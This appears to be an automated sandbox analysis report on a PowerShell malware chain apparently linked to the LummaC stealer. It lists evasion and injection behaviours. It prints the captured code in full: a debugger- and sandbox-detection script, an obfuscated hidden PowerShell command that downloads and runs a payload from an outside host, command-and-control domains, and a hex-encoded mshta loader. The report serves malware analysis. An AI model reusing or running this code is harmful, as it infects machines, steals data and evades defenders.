Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IEXF/VPHH.SW4C)ETZ-ZYO;%TP7(%Y{NUF"SDL6KIFPGIE~GMODEQ_LC/"MB5/J}RK1WABXJ#9QHA5TNB\KQU0@3OVZ:MFI28ARL:X29432206084357109792437722FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS \| WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','SI VARIABLE:\S9Q ''HTTPS://CDN1.KLIPBAZYXUI.SHOP/WEB44.DLE'';SET-VARIABLE D47 ([NET.WEBCLIENT]::NEW());.(GV XECT).VALUE.(((GV XECT).VALUE\|GET-MEMBER)[6].NAME).(((GV XECT).VALUE.(((GV XECT).VALUE\|GET-MEMBER)[6].NAME)\|GET-MEMBER\|?{$_.NAME-ILIKE''D''}).NAME)((GV XECT).VALUE.(((GV XECT).VALUE\|GET-MEMBER)[6].NAME).GETCOMMANDNAME(''IN-EXION'',$TRUE,$TRUE),[SYSTEM.MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)(LS VARIABLE:D47).VALUE.(((([NET.WEBCLIENT]::NEW()\|GET-MEMBER)\|?{$_.NAME-ILIKE''D*G''}).NAME))((GET-VARIABLE S9Q -VALUEON))';$UUYW = $ENV:APPDATA;FUNCTION ZJUP($KEHQ, $URRW){[IO.FILE]::WRITEALLBYTES($URRW, (NEW-OBJECT (UAKBI $IWMH.SUBSTRING(103,26))).DOWNLOADDATA($KEHQ))};FUNCTION UAKBI($XJDZ){RETURN (($XJDZ -SPLIT '(?<=\G..)'\|%{$IWMH.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION XJDZ(){FUNCTION EVWMV($GPDDP){IF(!(TEST-PATH -PATH $URRW)){ZJUP (UAKBI $GPDDP) $URRW}}}XJDZ;XR
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: REGMON.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS \| WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','SI VARIABLE:\S9Q ''HTTPS://CDN1.KLIPBAZYXUI.SHOP/WEB44.DLE'';SET-VARIABLE D47 ([NET.WEBCLIENT]::NEW());.(GV XECT).VALUE.(((GV XECT).VALUE\|GET-MEMBER)[6].NAME).(((GV XECT).VALUE.(((GV XECT).VALUE\|GET-MEMBER)[6].NAME)\|GET-MEMBER\|?{$_.NAME-ILIKE''D''}).NAME)((GV XECT).VALUE.(((GV XECT).VALUE\|GET-MEMBER)[6].NAME).GETCOMMANDNAME(''IN-EXION'',$TRUE,$TRUE),[SYSTEM.MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)(LS VARIABLE:D47).VALUE.(((([NET.WEBCLIENT]::NEW()\|GET-MEMBER)\|?{$_.NAME-ILIKE''DG''}).NAME))((GET-VARIABLE S9Q -VALUEON))';$UUYW = $ENV:APPDATA;FUNCTION ZJUP($KEHQ, $URRW){[IO.FILE]::WRITEALLBYTES($URRW, (NEW-OBJECT (UAKBI $IWMH.SUBSTRING(103,26))).DOWNLOADDATA($KEHQ))};FUNCTION UAKBI($XJDZ){RETURN (($XJDZ -SPLIT '(?<=\G..)'\|%{$IWMH.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION XJDZ(){FUNCTION EVWMV($GPDDP){IF(!(TEST-PATH -PATH $URRW)){ZJUP (UAKBI $GPDDP) $URRW}}}XJDZ;
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4867	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4299	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3894	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5951	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4286	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6348	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 572	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988	Thread sleep count: 4286 > 30	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_07277F00 GetSystemInfo,

4_2_07277F00

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000002.00000002.2134973002.000000000776A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.2134973002.000000000776A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000008.00000002.4459876560.0000000003560000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4458798218.000000000351C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.2947451235.0000000007810000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

API call chain: ExitProcess graph end node

graph_8-13694

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_0043BAD0 LdrInitializeThunk,

8_2_0043BAD0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).(((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name)|Get-Member|?{$_.Name-ilike'*d'}).Name)((GV *xec*t).Value.(((GV *xec*t).Value|Get-Member)[6].Name).GetCommandName('In*-Ex*ion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()|Get-Member)|?{$_.Name-ilike'D*g'}).Name))((Get-Variable s9q -ValueOn))

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe	String found in binary or memory: hummskitnj.buzz
Source: powershell.exe	String found in binary or memory: cashfuzysao.buzz
Source: powershell.exe	String found in binary or memory: appliacnesot.buzz
Source: powershell.exe	String found in binary or memory: screwamusresz.buzz
Source: powershell.exe	String found in binary or memory: inherineau.buzz
Source: powershell.exe	String found in binary or memory: scentniej.buzz
Source: powershell.exe	String found in binary or memory: rebuildeso.buzz
Source: powershell.exe	String found in binary or memory: prisonyfork.buzz
Source: powershell.exe	String found in binary or memory: noisercluch.click

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D